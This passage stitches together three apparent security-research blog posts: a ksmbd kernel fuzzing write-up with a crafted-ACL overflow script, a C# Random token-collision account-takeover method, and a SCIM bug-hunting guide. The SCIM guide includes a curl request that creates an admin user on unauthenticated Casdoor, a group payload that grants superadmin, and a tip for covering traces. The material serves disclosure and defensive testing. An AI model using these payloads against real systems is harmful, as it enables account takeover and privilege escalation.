smb2 leases (G)
vfs objects (S)

From a code perspective, in addition to smb2pdu.c, these source files were involved:

ndr.c – NDR encoding/decoding used in SMB structures
oplock.c – Oplock request and break handling
smbacl.c – Parsing and enforcement of SMB ACLs
vfs.c – Interface to virtual file system operations
vfs_cache.c – Cache layer for file and directory lookups

The remaining files in the fs/smb/server directory were either part of standard communication or exercising them required a more complex setup, as in the case of various authentication schemes.

Fuzzer Improvements

SMB3 expects a valid session setup before most operations, and its authentication flow is multi-step, requiring correct ordering. Implementing valid Kerberos authentication was impractical for fuzzing.

As described in the first part, we patched the NTLMv2 authentication to be able to interact with resources. We also explicitly allowed guest accounts and specified map to guest = bad user to allow a fallback to “guest” when credentials were invalid. After reporting CVE-2024-50285: ksmbd: check outstanding simultaneous SMB operations, credit limitations became more strict, so we patched that out as well to avoid rate limiting.

When we restarted syzkaller with a larger corpus, a few minutes later, all remaining candidates were rejected. After some investigation, we realized it was due to the default max connections = 128, which we had to increase to the maximum value 65536. No other limits were changed.

State Management

SMB interactions are stateful, relying on sessions, TreeIDs, and FileIDs. Fuzzing required simulating valid transitions like smb2_create ⇢ smb2_ioctl ⇢ smb2_close. When we initiated operations such as smb2_tree_connect, smb2_sess_setup, or smb2_create, we manually parsed responses in the pseudo-syscall to extract resource identifiers and reused them in subsequent calls. Our harness was programmed to send multiple messages per pseudo-syscall.

Example code for resources parsing is displayed below:

// process response. does not contain +4B PDU length
void process_buffer(int msg_no, const char *buffer, size_t received) {
  // .. snip ..

    // Extract SMB2 command
  uint16_t cmd_rsp = u16((const uint8_t *)(buffer + CMD_OFFSET));
  debug("Response command: 0x%04x\n", cmd_rsp);

  switch (cmd_rsp) {
    case SMB2_TREE_CONNECT:
      if (received >= TREE_ID_OFFSET + sizeof(uint32_t)) {
        tree_id = u32((const uint8_t *)(buffer + TREE_ID_OFFSET));
        debug("Obtained tree_id: 0x%x\n", tree_id);
      }
      break;

    case SMB2_SESS_SETUP:
      // First session setup response carries session_id
      if (msg_no == 0x01 &&
          received >= SESSION_ID_OFFSET + sizeof(uint64_t)) {
        session_id = u64((const uint8_t *)(buffer + SESSION_ID_OFFSET));
        debug("Obtained session_id: 0x%llx\n", session_id);
      }
      break;

    case SMB2_CREATE:
      if (received >= CREATE_VFID_OFFSET + sizeof(uint64_t)) {
        persistent_file_id = u64((const uint8_t *)(buffer + CREATE_PFID_OFFSET));
        volatile_file_id   = u64((const uint8_t *)(buffer + CREATE_VFID_OFFSET));
        debug("Obtained p_fid: 0x%llx, v_fid: 0x%llx\n",
              persistent_file_id, volatile_file_id);
      }
      break;

    default:
      debug("Unknown command (0x%04x)\n", cmd_rsp);
      break;
  }
}

Another issue we had to solve was that ksmbd relies on global state-memory pools or session tables, which makes fuzzing less deterministic. We tried enabling the experimental reset_acc_state feature to reset accumulated state, but it slowed down fuzzing significantly. We decided to not care much about reproducibility, since each bug typically appeared in dozens or even hundreds of test cases. For the rest, we used focused fuzzing, as described below.

Protocol Specification

We based our harness on the official SMB protocol specification by implementing a grammar for all supported SMB commands. Microsoft publishes detailed technical documents for SMB and other protocols as part of its Open Specifications program.

As an example, the wire format of the SMB2 IOCTL Request is shown below:

We then manually rewrote this specification into our grammar, which allowed our harness to automatically construct valid SMB2 IOCTL requests:

smb2_ioctl_req {
        Header_Prefix           SMB2Header_Prefix
        Command                 const[0xb, int16]
        Header_Suffix           SMB2Header_Suffix
        StructureSize           const[57, int16]
        Reserved                const[0, int16]
        CtlCode                 union_control_codes
        PersistentFileId        const[0x4, int64]
        VolatileFileId          const[0x0, int64]
        InputOffset             offsetof[Input, int32]
        InputCount              bytesize[Input, int32]
        MaxInputResponse        const[65536, int32]
        OutputOffset            offsetof[Output, int32]
        OutputCount             len[Output, int32]
        MaxOutputResponse       const[65536, int32]
        Flags                   int32[0:1]
        Reserved2               const[0, int32]
        Input                   array[int8]
        Output                  array[int8]
} [packed]

We did a final check against the source code to identify and verify possible mismatches during our translation.

Fuzzing Strategies

Since we were curious about the bugs that might be missed when using only the default syzkaller configuration with a corpus generated from scratch, we explored different fuzzing approaches, each of which is described in the following subsections.

FocusAreas

Occasionally, we triggered a bug that we were not able to reproduce, and it was not immediately clear from the crash log why it occurred. In other cases, we wanted to focus on a parsing function that had weak coverage. The experimental function focus_areas allows exactly that.

For instance, by targeting smb_check_perm_dacl with

"focus_areas": [
  {"filter": {"functions": ["smb_check_perm_dacl"]}, "weight": 20.0},
  {"filter": {"files": ["^fs/smb/server/"]}, "weight": 2.0},
  {"weight": 1.0}
]

we identified multiple integer overflows and were able to quickly suggest and confirm the patch.

To reach the vulnerable code, syzkaller constructed an ACL that passed validation and led to an integer overflow. After rewriting it in Python, it looked like this:

def build_sd():
    sd = bytearray(0x14)

    sd[0x00] = 0x00
    sd[0x01] = 0x00
    struct.pack_into("<H", sd, 0x02, 0x0001)
    struct.pack_into("<I", sd, 0x04, 0x78)
    struct.pack_into("<I", sd, 0x08, 0x00)
    struct.pack_into("<I", sd, 0x0C, 0x10000)
    struct.pack_into("<I", sd, 0x10, 0xFFFFFFFF) # dacloffset

    while len(sd) < 0x78:
        sd += b"A"

    sd += b"\x01\x01\x00\x00\x00\x00\x00\x00"
    sd += b"\xCC" * 64

    return bytes(sd)

sd = build_sd()
print(f"[+] Final SD length: {len(sd)}")

ANYBLOB

The anyTypes struct is used internally during fuzzing and it is less documented - probably because it’s not intended to be used directly. It is defined in prog/any.go and can represent multiple structures::

type anyTypes struct {
	union  *UnionType
	array  *ArrayType
	blob   *BufferType
    // .. snip..
}

Implemented in commit 9fe8aa4, the use case is to squash complex structures into a flat byte array, and apply just generic mutations.

Reading the test case is more illustrative to see how it works, where:

foo$any_in(&(0x7f0000000000)={0x11, 0x11223344, 0x2233, 0x1122334455667788, {0x1, 0x7, 0x1, 0x1, 0x1bc, 0x4}, [{@res32=0x0, @i8=0x44, "aabb"}, {@res64=0x1, @i32=0x11223344, "1122334455667788"}, {@res8=0x2, @i8=0x55, "cc"}]})

translates to

foo$any_in(&(0x7f0000000000)=ANY=[@ANYBLOB="1100000044332211223300000000000088776655443322117d00bc11", @ANYRES32=0x0, @ANYBLOB="0000000044aabb00", @ANYRES64=0x1, @ANYBLOB="443322111122334455667788", @ANYRES8=0x2, @ANYBLOB="0000000000000055cc0000"])`

The translation happens automatically as part of the fuzzing process. After running the fuzzer for several weeks, it stopped producing new coverage. Instead of manually writing inputs that followed the grammar and reached new paths, we used ANYBLOB, which allowed us to generate them easily.

The ANYBLOB is represented as a BufferType data type and we used public pcaps obtained here and here to generate a new corpus.

import json
import os

# tshark -r smb2_dac_sample.pcap -Y "smb || smb2" -T json -e tcp.payload > packets.json

os.makedirs("corpus", exist_ok=True)

def load_packets(json_file):
    with open(json_file, 'r') as file:
        data = json.load(file)
    
    packets = [entry["_source"]["layers"]["tcp.payload"] for entry in data]
    
    return packets

if __name__ == "__main__":
    json_file = "packets.json"
    packets = load_packets(json_file)
    
    for i, packet in enumerate(packets):
        pdu_size = len(packet[0])
        filename = f"corpus/packet_{i:03d}.txt"
        with open(filename, "w") as f:
            f.write(f"syz_ksmbd_send_req(&(0x7f0000000340)=ANY=[@ANYBLOB=\"{packet[0]}\"], {hex(pdu_size)}, 0x0, 0x0)")

After that, we used syz-db to pack all candidates into the corpus database and resumed fuzzing.

With that, we were able to immediately trigger ksmbd: fix use-after-free in ksmbd_sessions_deregister() and improve overall coverage by a few percent.

Sanitizer Coverage Beyond KASAN

In addition to KASAN, we tried other sanitizers such as KUBSAN and KCSAN. There was no significant improvement: KCSAN produced many false positives or reported bugs in unrelated components with seemingly no security impact. Interestingly, KUBSAN was able to identify one additional issue that KASAN did not detect:

id = le32_to_cpu(psid->sub_auth[psid->num_subauth - 1]);

In this case, the user was able to set psid->num_subauth to 0, which resulted in an incorrect read psid->sub_auth[-1]. Although this access still fell within the same struct allocation (smb_sid), UBSAN’s array index bounds check considered the declared bounds of the array

struct smb_sid {
	__u8 revision; /* revision level */
	__u8 num_subauth;
	__u8 authority[NUM_AUTHS];
	__le32 sub_auth[SID_MAX_SUB_AUTHORITIES]; /* sub_auth[num_subauth] */
} __attribute__((packed));

and was therefore able to catch the bug.

Coverage

One unresolved issue was fuzzing with multiple processes. Due to various locking mechanisms, and because we reused the same authentication state, we noticed that fuzzing was more stable and coverage increased faster when using only one process. We sent multiple requests within a single invocation, but initially worried that this would cause us to miss race conditions.

If we check the execution log, we see that syzkaller creates multiple threads inside one process, the same way it does when calling standard syscalls:

1.887619984s ago: executing program 0 (id=1628):
syz_ksmbd_send_req(&(0x7f0000000d40)={0xee, @smb2_read_req={{}, 0x8, {0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x1, "fbac8eef056a860726ca964fb4f60999"}, 0x31, 0x6, 0x2, 0x7e, 0x70, 0x4, 0x0, 0xffffffff, 0x2, 0x7, 0xee, 0x0, "1cad48fb0cba2f253915fe074290eb3e10ed9ac895dde2a575e4caabc1f3a537e265fea8a440acfd66cf5e249b1ccaae941160f24282c81c9df0260d0403bb44b0461da80509bd756c155b191718caa5eabd4bd89aa9bed58bf87d42ef49bca4c9f08f22d495b601c9c025631b815bf6cbeb0aa4785aec4abf776d75e5be"}}, 0xf2, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0)
syz_ksmbd_send_req(&(0x7f0000000900)=ANY=[@ANYRES16=<r0=>0x0], 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0) (async, rerun: 32)
syz_ksmbd_send_req(&(0x7f0000001440)=ANY=[@ANYBLOB="000008c0fe534d4240000000000000000b0001000000000000000000030000000000000000000000010000000100000000000000684155244ffb955e3201e88679ed735a39000000040214000400000000000000000000000000000078000000480800000000010000000000000000000000010001"], 0x8c4, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0) (async, rerun: 32)
syz_ksmbd_send_req(&(0x7f0000000200)={0x58, @smb2_oplock_break_req={{}, 0x12, {0x1, 0x0, 0x0, 0x9, 0x0, 0x1, 0x1, "3c66dd1fe856ec397e7f8d7c8c293fd6"}, 0x24}}, 0x5c, &(0x7f0000000000)=ANY=[@ANYBLOB="00000080fe534d424000010000000000050001000800000000000000040000000000000000000000010000000100000000000000b31fae29f7ea148ad156304f457214a539000000020000000000000000000000000000000000000000000002"], 0x84, &(0x7f0000000100)=ANY=[@ANYBLOB="00000062fe534d4240000000000000000e00010000000000000000000700000000000000000000000100000001000000000000000002000000ffff0000000000000000002100030a08000000040000000000000000000000000000006000020009000000aedf"], 0x66, 0x0, 0x0) (async)
...

Observe the async keyword automatically added during the fuzzing process, which allows running commands in parallel without blocking, implemented in this commit fd8caa5. Hence, no UAF was missed due to the seemingly absent parallelism.

In the end, based on syzkaller’s benchmark, we executed 20-30 processes per second in 20 VMs, which still potentially meant running several hundred commands. For reference, we used a server with an average configuration - nothing particularly optimized for fuzzing performance.

We measured coverage using syzkaller’s built-in function-level metrics. While we’re aware that this does not capture state transitions, which are critical in a protocol like SMB, it still provides a useful approximation of code exercised. Overall, the fs/smb/server directory reached around 60%. For smb2pdu.c specifically, which handles most SMB command parsing and dispatch, we reached 70%.

The screenshot below shows coverage across key files.

Discovered Bugs

During our research period, we reported a grand total of 23 bugs. The majority of the bugs are use-after-frees or out-of-bounds read or write findings. Given this quantity, it is natural that the impact differs. For instance, fix the warning from __kernel_write_iter is a simple warning that could only be used for DoS in a specific setup (kernel.panic_on_warn), validate zero num_subauth before sub_auth is accessed is a simple out-of-bounds 1-byte read, and prevent rename with empty string will only cause a kernel oops.

There are additional issues where exploitability requires more thoughtful analysis (e.g., fix type confusion via race condition when using ipc_msg_send_request). Nevertheless, after evaluating potentially promising candidates, we were able to identify some powerful primitives, allowing an attacker to exploit the finding at least locally to gain remote code execution.

The list of the issues identified is reported hereby:

Description	Commit	CVE
prevent out-of-bounds stream writes by validating *pos	0ca6df4	CVE-2025-37947
prevent rename with empty string	53e3e5b	CVE-2025-37956
fix use-after-free in ksmbd_session_rpc_open	a1f46c9	CVE-2025-37926
fix the warning from __kernel_write_iter	b37f2f3	CVE-2025-37775
fix use-after-free in smb_break_all_levII_oplock()	18b4fac	CVE-2025-37776
fix use-after-free in __smb2_lease_break_noti()	21a4e47	CVE-2025-37777
validate zero num_subauth before sub_auth is accessed	bf21e29	CVE-2025-22038
fix overflow in dacloffset bounds check	beff0bc	CVE-2025-22039
fix use-after-free in ksmbd_sessions_deregister()	15a9605	CVE-2025-22041
fix r_count dec/increment mismatch	ddb7ea3	CVE-2025-22074
add bounds check for create lease context	bab703e	CVE-2025-22042
add bounds check for durable handle context	542027e	CVE-2025-22043
prevent connection release during oplock break notification	3aa660c	CVE-2025-21955
fix use-after-free in ksmbd_free_work_struct	bb39ed4	CVE-2025-21967
fix use-after-free in smb2_lock	84d2d16	CVE-2025-21945
fix bug on trap in smb2_lock	e26e2d2	CVE-2025-21944
fix out-of-bounds in parse_sec_desc()	d6e13e1	CVE-2025-21946
fix type confusion via race condition when using ipc_msg_send_req..	e2ff19f	CVE-2025-21947
align aux_payload_buf to avoid OOB reads in cryptographic operati..	06a0254	-
check outstanding simultaneous SMB operations	0a77d94	CVE-2024-50285
fix slab-use-after-free in smb3_preauth_hash_rsp	b8fc56f	CVE-2024-50283
fix slab-use-after-free in ksmbd_smb2_session_create	c119f4e	CVE-2024-50286
fix slab-out-of-bounds in smb2_allocate_rsp_buf	0a77715	CVE-2024-26980

Note that we are aware of the controversy around CVE assignment since the Linux kernel became a CVE Numbering Authority (CNA) in February 2024. My personal take is that, while there were many disputable cases, the current approach is pragmatic: CVEs are now assigned for fixes with potential security impact, particularly memory corruptions and other classes of bugs that could potentially be exploitable.

For more information, the whole process is described in detail in this great presentation, or the relevant article. Lastly, the voting process for CVE approval is implemented in the vulns.git repository.

Conclusion

Our research yielded a few dozen bugs, although using pseudo-syscalls is generally discouraged and comes with several disadvantages. For instance, in all cases, we had to perform the triaging process manually by finding the relevant crash log entries, generating C programs, and minimizing them by hand.

Since syscalls can be tied using resources, this method could also be applied to ksmbd, which involves sending packets. It would be ideal for future research to explore this direction - SMB commands could yield resources that are then fed into different commands. Due to time restrictions, we followed the pseudo-syscall approach, relying on custom patches.

For the next and last part, we focus on exploiting CVE-2025-37947.

References

Trivial C# Random Exploitation

2025-08-19T00:00:00+02:00

Exploiting random number generators requires math, right? Thanks to C#’s Random, that is not necessarily the case! I ran into an HTTP 2.0 web service issuing password reset tokens from a custom encoding of (new Random()).Next(min, max) output. This led to a critical account takeover. Exploitation did not require scripting, math or libraries. Just several clicks in Burp. While I had source code, I will show a method of discovering and exploiting this vulnerability in a black-box or bug-bounty style engagement.

The exploit uses no math, but I do like math. So, there is a bonus section on how to optimize and invert Random.

The Vulnerability

I can’t share the client code, but it was something like this:

var num = new Random().Next(min, max);
var token = make_password_reset_token(num);
save_reset_token_to_db(user, token);
return issue_password_reset(user.email, token);

This represents a typical password reset. The token is created using Random(), and there is no seed. This gets encoded to an alphanumeric token. The token is sent to the user in email. The user can then log in with their email and token.

This may be trivially exploitable.

How the C# PRNG Works

Somehow documentation linked me to the following reference implementation. This is not the real implementation, but it’s good enough. Don’t get into the weeds here, the Random(int Seed) is only displayed for the sake of context.

Git link

      public Random()
        : this(Environment.TickCount) {
      }

      public Random(int Seed) {
        int ii;
        int mj, mk;

        //Initialize our Seed array.
        //This algorithm comes from Numerical Recipes in C (2nd Ed.)
        int subtraction = (Seed == Int32.MinValue) ? Int32.MaxValue : Math.Abs(Seed);
        mj = MSEED - subtraction;
        SeedArray[55]=mj; // [2]
        mk=1;
        for (int i=1; i<55; i++) {  //Apparently the range [1..55] is special (Knuth) and so we're wasting the 0'th position.
          ii = (21*i)%55;
          SeedArray[ii]=mk;
          mk = mj - mk;
          if (mk<0) mk+=MBIG;
          mj=SeedArray[ii];
        }
        for (int k=1; k<5; k++) {
          for (int i=1; i<56; i++) {
        SeedArray[i] -= SeedArray[1+(i+30)%55];
        if (SeedArray[i]<0) SeedArray[i]+=MBIG;
          }
        }
        inext=0;
        inextp = 21;
        Seed = 1;
      }

This whole system hinges on the 32 bit Seed. This builds the internal state (SeedArray[55]) with some ugly math. If Random is initialized without an argument, the Environment.TickCount is used as Seed. All output of a PRNG is determined by its seed. In this case, it’s the TickCount

essentially just time. So you can think of this whole algorithm as emailing you the time, just with a very odd encoding.

In some sense, you can even submit a time to encode. You do this, not with a URL parameter but by waiting. Wait for the right time and you get the encoding you want. What time, or event, should we wait for?

The Exploit

The documentation says it best.

In .NET Framework, the default seed value is derived from the system clock, which has finite resolution. As a result, different Random objects that are created in close succession by a call to the parameterless constructor have identical default seed values and, therefore, produce identical sets of random numbers.

If we submit two requests in the same 1ms window, we get the same Seed, same seed same output, same reset token sent to two email addresses. One email we own of course, the other belongs to an admin.

How do we hit the 1ms window? We use the single packet attack.

Will it really work though?

Blackbox Methodology

You don’t want to go spamming admins with reset emails before you even verify the vulnerability. So make two accounts on the website that you control. While you can do the attack with one account, it’s prone to false positives. You’re sending two account resets in rapid succession. The second request may write a different reset token to the DB before the email service reads the first, resulting in a false positive.

Use Burp’s repeater groups to perform the single packet attack to reset both accounts. Check your email for duplicate tokens. If you fail, go on testing other stuff until the lockout window dies. Then just hit send again, likely you don’t need to worry about keeping a session token alive.

Note: Burp displays round trip time in the lower-right corner of Repeater.

Keep an eye on that number. Each request has its own time. For me, it took about 10 requests before I got a duplicate token. That only occurred when the difference in round trip times was 1ms or less.

When launching the actual exploit, the only way to check if your token matches the victim account’s, is to log in. Login requests tend to be rate limited and guarded. So first verify with testing accounts. Use that to obtain a delta time window that works. Then, when launching the actual exploit, only attempt to log in when the delta time is within your testing bounds.

Ah… I guess subtracting two times counts as math. Exploiting PRNG’s always require math.

Wrapping Up

This attack is not completely novel. I have seen similar attacks used in CTFs. It’s a nice lesson on time though. We control time by waiting, or not waiting. If a secret token is just an encoded time, you can duplicate them by duplicating time.

If you look into the .NET runtime enough, you can convince yourself this attack won’t work. Random has more then one implementation, the one my client should have used does not seed by time. I can even prove this with dotnetfiddle. This is like the security version of “it works on my computer”. This is why we test “secure” code and why we fuzz with random input. So try this exploit next time you see a security token.

This applies to more then just C#’s Random. Consider Python’s uuid? The documentation warns of potential collisions due to lack of “synchronization” depending on “underlying platform”, unless safeUUID is used. I wonder if the attack will work there? Only one way to find out.

The fix for weak PRNG vulnerabilities is always to check the documentation. In this case you have to click the “Supplemental API remarks for Random.” in the “Remarks” section to get to the security info where it says:

To generate a cryptographically secure random number, such as one that’s suitable for creating a random password, use one of the static methods in the System.Security.Cryptography.RandomNumberGenerator class`.

So C# use RandomNumberGenerator instead of Random.

Bonus: Cracking C#’s Old Random Algorithm

Ahead is some math. It’s not too bad, but figured I would warn you. This is the “hard” way to exploit this finding. I wrote a library that can predict the output of Random::Next. It can also invert it, to go back to the seed. Or you can find the first output from the seventh output. None of this requires brute force, just a single modular equation. The code can be found here.

I intended this to be a fun weekend math project. Things got messed up when I found collisions due to an int underflow.

Seeding Is All Just Math

Let’s look at the seed algorithm, but try to generalize what you see. The SeedArray[55] is obviously the internal state of the PRNG. This is built up with “math”. If you look closely, almost every time SeedArray[i] is assigned, it’s with a subtraction. Right afterward you always see a check, did the subtraction results in a negative number? If so, add MBIG. In other words, all the subtraction is done mod MBIG.

The MBIG value is Int32.MaxValue, aka 0x7fffffff, aka 2^31 - 1. This is a Mersenne prime. Doing math, mod’ing a prime results in what math people call a Galois field. We only say that because Évariste Galois was so cool. A Galois field is just a nice way of saying “we can do all the normal algebra tricks we learned since middle school, even though this isn’t normal math”.

So, lets say SeedArray[i] is some a*Seed + b mod MBIG. It gets changed in a loop though by subtracting some other c*Seed + d mod MBIG. We don’t need that loop - algebra says to just (a+c)*Seed + (b+d) Mod MBIG. By churning through the loop doing algebra you can get every element of SeedArray in the form of a*Seed + b mod MBIG

Every time the PRNG is sampled, Random::InternalSample is called. That is just another subtraction. The result is both returned and used to set some element of SeedArray. It’s just some equation again. It’s still in the Galois field, it’s still just algebra and you can invert all of these equations. Given one output of Random::Next we can invert the corresponding equation and get the original Seed.

But, we can do more too!

csharp_rand.py library

The library I made builds SeedArray from these equations. It will output in terms of these equations. Let’s get the equation that represents the first output of Random for any Seed:

>>> from csharp_rand import csharp_rand
>>> cs = csharp_rand()
>>> first = cs.sample_equation(0)
>>> print(first)
rand = seed * 1121899819 + 1559595546 mod 2147483647

This represents the first output of Random for any seed. Use .resolve(42) to get the output of new Random(42).Next().

>>> first.resolve(42)
1434747710

Or invert and resolve 1434747710 to find out what seed will produce 1434747710 for the first output of Random.

>>> first.invert().resolve(1434747710)
42

This agrees with (dotnetfiddle).

See the readme for more complicated examples.

An int Underflow in Random

Having just finished my library, I excitedly showed it to the first person who would listen to me. Of course it failed. There must be a bug and of course I blamed the original implementation. But since account takeover bugs don’t care about my feelings, I fixed the code… mostly…

In short, the original implementation has an int underflow which throws the math equations off for certain seed values. Only certain SeedArray elements are affected. For example, the following shows the first output of Random does not need any adjustment, but 13th output does.

>>> print(cs.sample_equation(0))
rand = seed * 1121899819 + 1559595546 mod 2147483647
>>> print(cs.sample_equation(12))
rand = seed * 1476289907 + 1358625013 mod 2147483647 underflow adjustment: -2

So the 13th output will be seed * 1476289907 + 1358625013, unless the seed causes an underflow, then it will be off by -2. The code attempts to decide if the overflow occurs itself. This works great until you invert things.

Consider, what seed value will produce 908112456 as the 13th output of Random::Next?

>>> cs.sample_equation(12).invert().resolve2(908112456)
(619861032, 161844078)

Both seeds, 619861032 and 161844078, will produce 908112456 on the 13th output (poc). Seed 619861032 does it the proper way, from the non-adjusted equation. Seed 619861032 gets there from the underflow. This “collision” means there are exactly 2 seeds that produce the same output. This means 908112456 is 2x more likely to occur on the 13th output then the first. It also means there is no seed that will produce 908112458 on the 13th output of Random. A quick brute force produced some 80K+ other “collision” just like this one.

Bonus Conclusion

Sometimes the smart way is dumb. What started as a fun math thing ended up feeling like death by a thousand cuts. It’s better to version match and language match your exploit and get it going fast. If it takes a long time, start optimizing while it’s still running. But before you optimize, TEST! Test everything! Otherwise you will run a brute force for hours and get nothing. Why? well maybe Random(Environment.TickCount) is not Random() because explicitly seeding results in a different algorithm! Ugh…. I am going to go audit some more endpoints…

SCIM Hunting - Beyond SSO

2025-05-08T00:00:00+02:00

Introduction

Single Sign-On (SSO) related bugs have gotten an incredible amount of hype and a lot of amazing public disclosures in recent years. Just to cite a few examples:

And so on - there is a lot of gold out there.

Not surprisingly, systems using a custom implementation are the most affected since integrating SSO with a platform’s User object model is not trivial.

However, while SSO often takes center stage, another standard is often under-tested - SCIM (System for Cross-domain Identity Management). In this blogpost we will dive into its core aspects & the insecure design issues we often find while testing our clients’ implementations.

Classic AI Generated Placeholder Image

SCIM 101
Hunting for Bugs
Extra Focus Areas
Conclusions

SCIM 101

SCIM is a standard designed to automate the provisioning and deprovisioning of user accounts across systems, ensuring access consistency between the connected parts.

The standard is defined in the following RFCs: RFC7642, RFC7644, RFC7643.

While it is not specifically designed to be an IdP-to-SP protocol, rather a generic user pool syncing protocol for cloud environments, real-world scenarios mostly embed it in the IdP-SP relationship.

Core Components

To make a long story short, the standard defines a set of RESTful APIs exposed by the Service Providers (SP) which should be callable by other actors (mostly Identity Providers) to update the users pool.

It provides REST APIs with the following set of operations to edit the managed objects (see scim.cloud):

Create: POST https://example-SP.com/{v}/{resource}
Read: GET https://example-SP.com/{v}/{resource}/{id}
Replace: PUT https://example-SP.com/{v}/{resource}/{id}
Delete: DELETE https://example-SP.com/{v}/{resource}/{id}
Update: PATCH https://example-SP.com/{v}/{resource}/{id}
Search: GET https://example-SP.com/{v}/{resource}?<SEARCH_PARAMS>
Bulk: POST https://example-SP.com/{v}/Bulk

So, we can summarize SCIM as a set APIs usable to perform CRUD operations on a set of JSON encoded objects representing user identities.

Core Functionalities

If you want to look into a SCIM implementation for bugs, here is a list of core functionalities that would need to be reviewed during an audit:

Server Config & Authn/z Middlewares - SCIM does not define its authn/authz method, hence it will always be custom
SCIM Object to Internal Objects Mapping Function - How the backend is converting / linking the SCIM objects to the internal Users and Groups objects. Most of the times they are more complex and have tons of constraints & || safety checks.
A few examples: internal attributes that should not be user-controlled, platform-specific attributes not allowed in SCIM, etc.
Operations Exec Logic - Changes within identity-related objects typically trigger application flows. A few examples include: email update should trigger a confirmation flow / flag the user as unconfirmed, username update should trigger ownership / pending invitations / re-auth checks and so on.

Mind The Impact

As direct IdP-to-SP communication, most of the resulting issues will require a certain level of access either in the IdP or SP. Hence, the complexity of an attack may lower most of your findings. Instead, the impact might be skyrocketing in Multi-tenant Platforms where SCIM Users may lack tenant-isolation logic common.

Hunting for Bugs

The following are some juicy examples of bugs you should look for while auditing SCIM implementations.

Auth Bypasses

A few months ago we published our advisory for an Unauthenticated SCIM Operations In Casdoor IdP Instances. It is an open-source identity solution supporting various auth standards such as OAuth, SAML, OIDC, etc. Of course SCIM was included, but as a service, meaning the Casdoor (IdP) would also allow external actors to manipulate its users pool.

Casdoor utilized the elimity-com/scim library, which, by default, does not include authentication in its configuration as per the standard. Consequently, a SCIM server defined and exposed using this library remains unauthenticated.

server := scim.Server{
 Config: config,
 ResourceTypes: resourceTypes,
 }

Exploiting an instance required emails matching the configured domains. A SCIM POST operation was usable to create a new user matching the internal email domain and data.

➜ curl --path-as-is -i -s -k -X $'POST' \
 -H $'Content-Type: application/scim+json'-H $'Content-Length: 377' \
 --data-binary $’{\"active\":true,\"displayName\":\"Admin\",\"emails\":[{\"value\":
\"admin2@victim.com\"}],\"password\":\"12345678\",\"nickName\":\"Attacker\",
\"schemas\":[\"urn:ietf:params:scim:schemas:core:2.0:User\",
\"urn:ietf:params:scim:schemas:extension:enterprise:2.0:User\"],
\"urn:ietf:params:scim:schemas:extension:enterprise:2.0:User\":{\"organization\":
\"built-in\"},\"userName\":\"admin2\",\"userType\":\"normal-user\"}' \
 $'https://<CASDOOR_INSTANCE>/scim/Users' 

Then, authenticate to the IdP dashboard with the new admin user admin2:12345678.

Note: The maintainers released a new version (v1.812.0), which includes a fix.

While that was a very simple yet critical issue, bypasses could be found in authenticated implementations. In other cases the service could be available only internally and unprotected.

SCIM Token Management

[*] IdP-Side Issues

Since SCIM secrets allow dangerous actions on the Service Providers, they should be protected from extractions happening after the setup. Testing or editing an IdP SCIM integration on a configured application should require a new SCIM token in input, if the connector URL differs from the one previously set.

A famous IdP was found to be issuing the SCIM integration test requests to /v1/api/scim/Users?startIndex=1&count=1 with the old secret while accepting a new baseURL.

+1 Extra - Covering traces: Avoid logging errors by mocking a response JSON with the expected data for a successful SCIM integration test. An example mock response’s JSON for a Users query:

{
    "Resources": [
        {
            "externalId": "<EXTID>",
            "id": "francesco+scim@doyensec.com",
            "meta": {
                "created": "2024-05-29T22:15:41.649622965Z",
                "location": "/Users/francesco+scim@doyensec.com",
                "version": "<VERSION"
            },
            "schemas": [
                "urn:ietf:params:scim:schemas:core:2.0:User"
            ],
            "userName": "francesco+scim@doyensec.com"
        }
    ],
    "itemsPerPage": 2,
    "schemas": [
        "urn:ietf:params:scim:api:messages:2.0:ListResponse"
    ],
    "startIndex": 1,
    "totalResults": 8
}

[*] SP-Side Issues

The SCIM token creation & read should be allowed only to highly privileged users. Target the SP endpoints used to manage it and look for authorization issues or target it with a nice XSS or other vulnerabilities to escalate the access level in the platform.

Unwanted User Re-provisioning Fallbacks

Since ~real-time user access management is the core of SCIM, it is also worth looking for fallbacks causing a deprovisioned user to be back with access to the SP.

As an example, let’s look at the update_scimUser function below.

def can_be_reprovisioned?(usrObj)
		return true if usrObj.respond_to?(:active) && !usrObj.active?
		false

def update_scimUser(usrObj)
        # [...]
        if parser.deprovision_user?
          # [...]
        #  (o)__(o)'
        elsif can_be_reprovisioned?(usrObj) 
          reprovision(usrObj)
        else
          true
        end
      end

Since respond_to?(:active) is always true for SCIM identities. If the user is not active, the condition !identity.active? will always be true and cause the re-provisioning.

Consequently, any SCIM update request (e.g., change lastname) will fallback to re-provisioning if the user was not active for any reason (e.g., logical ban, forced removal).

Internal Attributes Manipulation

While outsourcing identity syncing to SCIM, it becomes critical to choose what will be copied from the SCIM objects into the new internal ones, since bugs may arise from an “excessive” attribute allowance.

[*] Example 1 - Privesc To Internal Roles

A client supported Okta Groups and Users to be provisioned and updated via SCIM endpoints.

It converted Okta Groups into internal roles with custom labeling to refer to “Okta resources”. In particular, the function resource_to_access_map constructed an unvalidated access mapping from the supplied SCIM group resource.

[...]
    group_data, decode_error := decode_group_resource(resource.Attributes.AsMap())

    var role_list []string
    //  (o)__(o)'
    if resource.Id != "" {
        role_list = []string{resource.Id}
    }
    //...
    return access_map, nil, nil

The implementation issue resided in the fact that the role names in role_list were constructed on an Id attribute (urn:ietf:params:scim:schemas:core:2.0:Group) passed from a third-party source.

Later, another function upserted the Role objects, constructed from the SCIM event, without further checks. Hence, it was possible to overwrite any existing resource in the platform by matching its name in a SCIM Group ID.

As an example, if the SCIM Group resource ID was set to an internal role name, funny things happened.

POST /api/scim/Groups HTTP/1.1
Host: <PLATFORM>
Content-Type: application/json; charset=utf-8
Authorization: Bearer 650…[REDACTED]…
…[REDACTED]…
Content-Length: 283
{
    "schemas": [“urn:ietf:params:scim:schemas:core:2.0:Group"],
    "id":"superadmin",
    "displayName": "TEST_NAME",
    "members": [{
        "value": "francesco@doyensec.com",
        "display": "francesco@doyensec.com"
    }]
}

The platform created an access map named TEST_NAME, granting the superadmin role to members.

[*] Example 2 - Mass Assignment In SCIM-To-User Mapping

Other internal attributes manipulation may be possible depending on the object mapping strategy. A juicy example could look like the one below.

SSO_user.update!(
        external_id: scim_data["externalId"],
        #         (o)__(o)' 
        userData: Oj.load(scim_req_body),
      )

